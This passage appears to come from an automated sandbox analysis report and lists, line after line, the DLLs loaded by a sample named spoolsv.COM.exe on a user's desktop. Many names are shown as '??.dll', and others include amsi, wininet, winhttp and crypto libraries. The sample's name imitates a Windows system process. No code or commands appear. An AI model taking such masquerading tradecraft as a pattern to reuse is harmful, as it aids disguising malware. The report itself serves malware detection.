          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: winmm.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??l.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ??.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: winhttpcom.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: webio.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: ieproxy.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: mssip32.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: smartscreenps.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\spoolsv.COM.exeSection loaded: amsi.dllJump to behavior
